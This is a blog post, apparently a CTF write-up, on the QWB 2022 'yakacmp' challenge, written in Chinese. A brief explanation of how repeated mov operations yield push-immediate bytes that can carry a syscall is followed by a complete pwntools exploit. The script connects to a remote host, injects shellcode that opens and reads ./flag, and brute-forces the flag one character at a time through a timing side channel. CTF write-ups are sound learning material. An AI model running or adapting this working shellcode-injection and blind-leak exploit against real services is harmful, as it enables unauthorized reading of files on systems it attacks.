ha1vk's blog
0%

qwb2022_yakacmp

发表于 分类于

当mov的次数超过10时,会生成push immediate的指令,由于push指令在cpu解析执行时,最多为4字节,于是会导致immediate立即数中后4字节成为指令。

因此,我们可以将需要的一些指令放入立即数中,比如syscall,通过构造read继续输入数据,并将数据存放于当前片段的后方。我们可以将后续的shellcode从这个read中输入。
禁用了write,因此只能进行flag的盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
import time

#context(os='linux',arch='amd64',log_level = 'critical')
#flag里面可能出现的字符
possible_char = []
#字符的顺序可以影响效率,让频率最高的字符放前面
for x in range(0,10):
   possible_char.append(str(x))
for x in range(ord('a'),ord('z')+1):
   possible_char.append(chr(x))
possible_char.append('{')
possible_char.append('-')
possible_char.append('_')
possible_char.append('}')
possible_char.append('\x00')

OK = False
flag = ''
index = 0

while not OK:
   print 'guess (',index,') char'
   length = len(flag)
   for guess_char in possible_char:
      #sh = process('./yakacmp')
      sh = remote('47.93.52.218',20848)

      code = ('mov r2,%d\n' % (0x6666666666666666))*10
      code += 'mov r2,%d\n' % 0x58ff314800000000
      code += 'mov r2,%d\n' % 0x53d2314800000000
      code += 'mov r2,%d\n' % 0x53ffb25e233300a9
      #syscall
      code += 'mov r1,%d\n' % (0x050F905b66666666)
      sh.sendlineafter('now',code)

      for i in range(14):
         sh.recvuntil('more operation?')
      #raw_input()
      sh.sendline('NO')
      sh.recvuntil('over')

      shellcode = asm('''
         mov rax,0x2
         mov rdi,0x67616c662f2e
         push rdi
         lea rdi,[rsp]
         mov rsi,0
         syscall
         mov rdi,rax
         lea rsi,[rsp]
         mov rdx,0x50
         xor rax,rax
         syscall
      compare:
         cmp byte ptr[rsp+%d],%d
         jz compare
         ret
      ''' % (index,ord(guess_char)))
      sleep(1)
      #raw_input()
      sh.sendline(shellcode)
      #sleep(1)
      sh.sendline('a'*0x6000)
      #sh.interactive()

      start = time.time()
      sh.recvall(timeout = 6)
      end = time.time()
      #raw_input()
      #sh.interactive()
      sh.close()
      #根据网络延迟,作相应的修改
      if end - start > 3:
         if guess_char == '\x00':
            OK = True
         flag += guess_char
         print 'success guess char at(',index,')'
         index+=1
         break
   print 'flag=',flag
   if length == len(flag):
      OK = True

sh.interactive()